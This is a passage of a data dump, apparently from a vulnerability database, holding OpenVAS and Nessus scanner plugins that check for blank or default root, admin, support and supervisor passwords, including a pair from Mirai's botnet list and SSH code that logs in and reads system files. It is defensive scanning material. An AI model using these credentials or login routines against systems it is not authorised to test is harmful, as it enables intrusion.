"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-24T17:04:07", "description": "The remote host has set no password for the root account.", "cvss3": {}, "published": "2019-05-24T00:00:00", "type": "openvas", "title": "Unpassworded 'root' Account (Telnet)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2019-5021"], "modified": "2020-03-24T00:00:00", "id": "OPENVAS:1361412562310108586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108586", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108586\");\n script_version(\"2020-03-24T06:41:42+0000\");\n script_cve_id(\"CVE-2019-5021\", \"CVE-1999-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-24 12:35:09 +0000 (Fri, 24 May 2019)\");\n script_name(\"Unpassworded 'root' Account (Telnet)\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\", \"os_detection.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"telnet/banner/available\");\n script_exclude_keys(\"telnet/no_login_banner\", \"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://talosintelligence.com/vulnerability_reports/TALOS-2019-0782\");\n script_xref(name:\"URL\", value:\"https://alpinelinux.org/posts/Docker-image-vulnerability-CVE-2019-5021.html\");\n\n script_tag(name:\"summary\", value:\"The remote host has set no password for the root account.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain access to\n sensitive information or modify system configuration.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to login with a 'root' username and without a password.\");\n\n script_tag(name:\"insight\", value:\"It was possible to login with the 'root' username and without passing\n a password.\");\n\n script_tag(name:\"affected\", value:\"Versions of the Official Alpine Linux Docker images (since v3.3) are\n known to be affected. Other products / devices might be affected as well.\");\n\n script_tag(name:\"solution\", value:\"Set a password for the 'root' account. If this is an Alpine Linux Docker image\n update to one of the following image releases:\n\n edge (20190228 snapshot), v3.9.2, v3.8.4, v3.7.3, v3.6.5.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"telnet_func.inc\");\ninclude(\"default_account.inc\");\ninclude(\"misc_func.inc\");\n\nport = telnet_get_port( default:23 );\nif( get_kb_item( \"telnet/\" + port + \"/no_login_banner\" ) )\n exit( 0 );\n\nif( _check_telnet( port:port, login:\"root\" ) ) {\n report = \"It was possible to login as user 'root' without a password and to execute the 'id' command.\";\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-26T13:21:30", "description": "The remote host has set no password for the root account.", "cvss3": {}, "published": "2019-05-24T00:00:00", "type": "openvas", "title": "Unpassworded 'root' Account (SSH)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2019-5021"], "modified": "2020-04-22T00:00:00", "id": "OPENVAS:1361412562310108587", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108587", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108587\");\n script_version(\"2020-04-22T14:19:41+0000\");\n script_cve_id(\"CVE-2019-5021\", \"CVE-1999-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-22 14:19:41 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-24 12:35:09 +0000 (Fri, 24 May 2019)\");\n script_name(\"Unpassworded 'root' Account (SSH)\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"ssh_detect.nasl\", \"os_detection.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"ssh/server_banner/available\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://talosintelligence.com/vulnerability_reports/TALOS-2019-0782\");\n script_xref(name:\"URL\", value:\"https://alpinelinux.org/posts/Docker-image-vulnerability-CVE-2019-5021.html\");\n\n script_tag(name:\"summary\", value:\"The remote host has set no password for the root account.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain access to\n sensitive information or modify system configuration.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to login with a 'root' username and without a password.\");\n\n script_tag(name:\"insight\", value:\"It was possible to login with the 'root' username and without passing\n a password.\");\n\n script_tag(name:\"affected\", value:\"Versions of the Official Alpine Linux Docker images (since v3.3) are\n known to be affected. Other products / devices might be affected as well.\");\n\n script_tag(name:\"solution\", value:\"Set a password for the 'root' account. If this is an Alpine Linux Docker image\n update to one of the following image releases:\n\n edge (20190228 snapshot), v3.9.2, v3.8.4, v3.7.3, v3.6.5.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"host_details.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = ssh_get_port( default:22 );\nif( ! soc = open_sock_tcp( port ) )\n exit( 0 );\n\nlogin = ssh_login( socket:soc, login:\"root\", password:\"\", priv:NULL, passphrase:NULL );\nif( login == 0 ) {\n\n files = traversal_files( \"linux\" );\n\n foreach pattern( keys( files ) ) {\n\n file = \"/\" + files[pattern];\n\n cmd = ssh_cmd( socket:soc, cmd:'cat ' + file, nosh:TRUE );\n\n if( egrep( string:cmd, pattern:pattern, icase:TRUE ) ) {\n if( soc )\n close( soc );\n report = 'It was possible to login as user `root` without a password and to execute `cat ' + file + '`. Result:\\n\\n' + cmd;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nif( soc )\n close( soc );\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-10-19T03:22:20", "description": "Nessus was able to login to the remote host using the following credentials :\n\n Username : root Password : 12345678\n\nOn older Macintosh computers, Mac OS X server is configured with this default account (on newer computers, the serial number of the system is used instead).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-07-07T00:00:00", "type": "nessus", "title": "Default Password (12345678) for 'root' Account on MacOS X Server", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "MACOSX_SERVER_DEFAULT_PASSWORD.NASL", "href": "https://www.tenable.com/plugins/nessus/12513", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12513);\n script_version(\"$Revision: 1.24 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:32:08 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (12345678) for 'root' Account on MacOS X Server\");\n script_summary(english:\"Logs into the remote host\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"A default account was detected on the remote host.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Nessus was able to login to the remote host using the following\ncredentials :\n\n Username : root\n Password : 12345678\n\nOn older Macintosh computers, Mac OS X server is configured with\nthis default account (on newer computers, the serial number of the\nsystem is used instead).\" );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Set a strong password for the root account.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"ssh_detect.nasl\", \"os_fingerprint.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n exit(0);\n}\n\n#\n# The script code starts here :\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\naccount = \"root\";\npassword = \"12345678\";\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:20:56", "description": "The account 'admin' on the remote host has the default password 'QwestM0dem'. A remote attacker can exploit this issue to gain administrative access to the affected system.\n\nNote that this username / password combination was found in the leaked source from the Mirai botnet.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-01T00:00:00", "type": "nessus", "title": "Default Password 'QwestM0dem' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_QWESTM0DEM.NASL", "href": "https://www.tenable.com/plugins/nessus/104974", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"QwestM0dem\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104974);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'QwestM0dem' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'QwestM0dem'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\n\nNote that this username / password combination was found in the leaked\nsource from the Mirai botnet.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://en.wikipedia.org/wiki/Mirai_(malware)\");\n # https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-attack-attempts-detected-south-america-north-african-countries/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae5b1f64\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:16:58", "description": "The account 'root' on the remote host has the password 'admin'.\nAn attacker may leverage this issue to gain access, likely as an administrator, to the affected system.\n\nNote that DD-WRT, an open source Linux-based firmware popular on small routers and embedded systems, is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-07-23T00:00:00", "type": "nessus", "title": "Default Password (admin) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/40355", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"admin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40355);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (admin) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'admin'.\nAn attacker may leverage this issue to gain access, likely as an\nadministrator, to the affected system.\n\nNote that DD-WRT, an open source Linux-based firmware popular on\nsmall routers and embedded systems, is known to use these\ncredentials by default.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:46:21", "description": "The account 'root' on the remote host has the password 'changemenow'.\nAn attacker can leverage this issue to gain administrative access to the affected system.\n\nNote that Splunk virtual appliances are known to use these credentials to provide administrative access to the host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-02-04T00:00:00", "type": "nessus", "title": "Default Password (changemenow) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_CHANGEMENOW.NASL", "href": "https://www.tenable.com/plugins/nessus/81168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"changemenow\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81168);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (changemenow) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'changemenow'.\nAn attacker can leverage this issue to gain administrative access to\nthe affected system.\n\nNote that Splunk virtual appliances are known to use these credentials\nto provide administrative access to the host.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ssh\", 22, \"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:59", "description": "The account 'support' on the remote host has the default password 'support'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'support' for 'support' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SUPPORT_SUPPORT.NASL", "href": "https://www.tenable.com/plugins/nessus/94405", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"support\";\npassword = \"support\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94405);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'support' for 'support' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'support' on the remote host has the default password\n'support'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:59", "description": "The account 'supervisor' on the remote host has the default password 'supervisor'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'supervisor' for 'supervisor' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SUPERVISOR_SUPERVISOR.NASL", "href": "https://www.tenable.com/plugins/nessus/94404", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"supervisor\";\npassword = \"supervisor\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94404);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n 